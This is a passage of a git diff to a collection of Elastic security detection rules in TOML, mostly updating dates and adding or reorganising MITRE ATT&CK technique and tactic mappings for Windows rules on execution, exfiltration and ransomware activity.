+reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/execution_suspicious_pdf_reader.toml b/rules/windows/execution_suspicious_pdf_reader.toml index c816d82ecd2..8dbb330504c 100644 --- a/rules/windows/execution_suspicious_pdf_reader.toml +++ b/rules/windows/execution_suspicious_pdf_reader.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,31 +113,117 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique.subtechnique]] +id = "T1016.001" +name = "Internet Connection Discovery" +reference = "https://attack.mitre.org/techniques/T1016/001/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/windows/execution_suspicious_psexesvc.toml b/rules/windows/execution_suspicious_psexesvc.toml index 6fcd26f682b..fc830cb9c34 100644 --- a/rules/windows/execution_suspicious_psexesvc.toml +++ b/rules/windows/execution_suspicious_psexesvc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,36 +80,54 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/execution_via_compiled_html_file.toml b/rules/windows/execution_via_compiled_html_file.toml index 15d381da770..527d9eae410 100644 --- a/rules/windows/execution_via_compiled_html_file.toml +++ b/rules/windows/execution_via_compiled_html_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -145,36 +145,56 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.001" name = "Compiled HTML File" reference = "https://attack.mitre.org/techniques/T1218/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml index df930dae4f7..1561c064fc1 100644 --- a/rules/windows/execution_via_hidden_shell_conhost.toml +++ b/rules/windows/execution_via_hidden_shell_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,38 +107,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_via_mmc_console_file_unusual_path.toml b/rules/windows/execution_via_mmc_console_file_unusual_path.toml index 52678af5806..4d0567ab563 100644 --- a/rules/windows/execution_via_mmc_console_file_unusual_path.toml +++ b/rules/windows/execution_via_mmc_console_file_unusual_path.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/19" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,10 +106,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" @@ -120,27 +122,35 @@ id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_windows_cmd_shell_susp_args.toml b/rules/windows/execution_windows_cmd_shell_susp_args.toml index 9d8c461049c..7e8578f6b1a 100644 --- a/rules/windows/execution_windows_cmd_shell_susp_args.toml +++ b/rules/windows/execution_windows_cmd_shell_susp_args.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -161,19 +161,59 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml index f2fdff5ae2b..3b73fe7f124 100644 --- a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml +++ b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,10 +84,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -98,47 +100,58 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.004" +name = "Malicious Copy and Paste" +reference = "https://attack.mitre.org/techniques/T1204/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" \ No newline at end of file +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/execution_windows_phish_clickfix.toml b/rules/windows/execution_windows_phish_clickfix.toml index 499cedf6295..ff9f43a3a9f 100644 --- a/rules/windows/execution_windows_phish_clickfix.toml +++ b/rules/windows/execution_windows_phish_clickfix.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,10 +83,12 @@ not (process.name : "rundll32.exe" and process.args : ("ndfapi.dll,NdfRunDllDiag [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -97,45 +99,61 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" +[[rule.threat.technique.subtechnique]] +id = "T1204.004" +name = "Malicious Copy and Paste" +reference = "https://attack.mitre.org/techniques/T1204/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" diff --git a/rules/windows/execution_windows_powershell_susp_args.toml b/rules/windows/execution_windows_powershell_susp_args.toml index ff0cfea3021..12f07fbe1e5 100644 --- a/rules/windows/execution_windows_powershell_susp_args.toml +++ b/rules/windows/execution_windows_powershell_susp_args.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -186,19 +186,54 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_windows_script_from_internet.toml b/rules/windows/execution_windows_script_from_internet.toml index b0f8b6c40d2..1df195731bd 100644 --- a/rules/windows/execution_windows_script_from_internet.toml +++ b/rules/windows/execution_windows_script_from_internet.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/31" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" min_stack_version = "9.1.0" min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases." @@ -93,6 +93,16 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" @@ -103,23 +113,29 @@ id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" @@ -130,10 +146,7 @@ id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/exfiltration_rclone_cloud_upload.toml b/rules/windows/exfiltration_rclone_cloud_upload.toml index 48377c25e27..b66cc9b1c73 100644 --- a/rules/windows/exfiltration_rclone_cloud_upload.toml +++ b/rules/windows/exfiltration_rclone_cloud_upload.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,12 +84,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/exfiltration_smb_rare_destination.toml b/rules/windows/exfiltration_smb_rare_destination.toml index 1e007cf4c87..5811c56fa8d 100644 --- a/rules/windows/exfiltration_smb_rare_destination.toml +++ b/rules/windows/exfiltration_smb_rare_destination.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,17 +117,29 @@ event.category:network and host.os.type:windows and process.pid:4 and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["destination.ip"] diff --git a/rules/windows/impact_high_freq_file_renames_by_kernel.toml b/rules/windows/impact_high_freq_file_renames_by_kernel.toml index e2d3edbbce1..8cbbdcf1d46 100644 --- a/rules/windows/impact_high_freq_file_renames_by_kernel.toml +++ b/rules/windows/impact_high_freq_file_renames_by_kernel.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,30 +86,41 @@ from logs-endpoint.events.file-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - - diff --git a/rules/windows/impact_mod_critical_os_files.toml b/rules/windows/impact_mod_critical_os_files.toml index 7aa911b6309..6453a27428d 100644 --- a/rules/windows/impact_mod_critical_os_files.toml +++ b/rules/windows/impact_mod_critical_os_files.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -93,18 +93,28 @@ file where host.os.type == "windows" and event.type in ("change", "deletion") an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" + [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/windows/impact_ransomware_file_rename_smb.toml b/rules/windows/impact_ransomware_file_rename_smb.toml index 7f585c29ae5..06640b4a521 100644 --- a/rules/windows/impact_ransomware_file_rename_smb.toml +++ b/rules/windows/impact_ransomware_file_rename_smb.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,36 +82,41 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/impact_ransomware_note_file_over_smb.toml b/rules/windows/impact_ransomware_note_file_over_smb.toml index 392a87fdba2..ed12fe35795 100644 --- a/rules/windows/impact_ransomware_note_file_over_smb.toml +++ b/rules/windows/impact_ransomware_note_file_over_smb.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,36 +82,41 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/impact_stop_process_service_threshold.toml b/rules/windows/impact_stop_process_service_threshold.toml index e6e6087c445..1c69ec5bafb 100644 --- a/rules/windows/impact_stop_process_service_threshold.toml +++ b/rules/windows/impact_stop_process_service_threshold.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/03" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/06/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ 